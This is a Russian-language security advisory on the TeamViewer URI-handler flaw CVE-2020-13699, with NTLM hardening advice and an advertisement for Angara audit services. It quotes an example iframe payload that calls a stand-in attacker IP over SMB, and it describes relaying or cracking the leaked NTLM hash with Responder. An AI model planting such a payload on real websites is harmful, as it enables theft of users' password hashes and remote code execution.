Производитель популярного ПО удаленного управления и показа TeamViewer предупредил об опасной уязвимости.
Злоумышленник может встроить вредоносный iframe на веб-сайт с созданным URL (<ifr ame src = 'teamviewer10: --play IP-атакующего share fake.tvs'>), что запустит настольный клиент TeamViewer Windows и заставит его открыть удаленный доступ к ресурсу по SMB (SMB share). Windows выполнит проверку подлинности NTLM при открытии шары SMB, и этот запрос может быть ретранслирован (с помощью инструмента responder) для выполнения кода (или использован для захвата и взлома хэша). Таким образом, преступник может использовать URI схему TeamViewer для утечки имени систем, хэша пароля и других данных.
Этой проблеме подвержены обработчики URI: teamviewer10, teamviewer8, teamviewerapi, tvchat1, tvcontrol1, tvfiletransfer1, tvjoinv8, tvpresent1, tvsendfile1, tvsqcustomer1, tvsqsupport1, tvvideocall1 и tvvpn1. Проблема может быть исправлена путем цитирования параметров, переданных вышеупомянутым URI обработчиком, например URL: teamviewer10 Протокол "C: Program Files (x86) TeamViewer TeamViewer.exe" "% 1"
Уязвимость получила идентификатор CVE 2020-13699 и устраняется обновлением ПО TeamViewer.
К слову, уязвимости NTLM, позволяющие использовать его для подобной утечки данных – это CVE-2019-1040 и CVE-2019-1019. Для них доступны программные коррекции (patch) и следующие рекомендации:
• применять подписывание SMB (SMB signing) на всех машинах сети,
• блокировать NTLMv1,
• применять подписывание LDAP/S (LDAP/S Signing),
• обязательно использовать расширенную защиту аутентификации (Enhanced Protection for Authentication – EPA) при запросах,
• отдавать предпочтение другим схемам аутентификации (Kerberos и др.).
Обновление системного и прикладного ПО требует обязательного и своевременного выполнения. Кроме того, важно регулярно производить аудит ПО на корректность настройки с точки зрения ИБ и использовать рекомендованные параметры. Для этого необходим экспертный уровень знаний как принципов работы ИТ-инфраструктуры, так и ИБ-рекомендаций. Это разные направления ИТ-деятельности и сочетание таких знаний достаточно редко.
Компания Angara Professional Assistance (входит в группу компаний Angara) предлагает экспертную сервисную услугу технического аудита, которая включает проверку эффективности ИТ-систем, степени их защищенности как в части технических средств, так и в части понимания пользователями норм информационной безопасности. Услуга представляет два основных направления аудита:
Health Check. Предусматривает обследование и оценку «состояния здоровья» системы, оптимальности архитектуры, достаточности системных ресурсов, уровня отказоустойчивости и готовности к восстановлению в случае критических сбоев. Оценка проводится на основе рекомендаций производителя и опыта инженеров эксплуатации и сопровождения.
Security Health Check. Предусматривает обследование и оценку «уровня самозащиты» системы, выполнения таких базовых процессов обеспечения безопасности, как управление доступом к системе, журналирование и мониторинг событий, а также оценку обеспечения отказоустойчивости и готовности к восстановлению в случае критических сбоев.
Подробнее об услуге и тарифах можно узнать у менеджеров Angara Professional Assistance по e-mail info@angarapro.ru или телефону 8 (495) 269-26-06.
Кроме того, на есть небольшой опросный лист самопроверки, результатом которого будет краткая оценка уровня самозащиты, отказоустойчивости, качества сопровождения и общее состояние здоровья информационных систем.
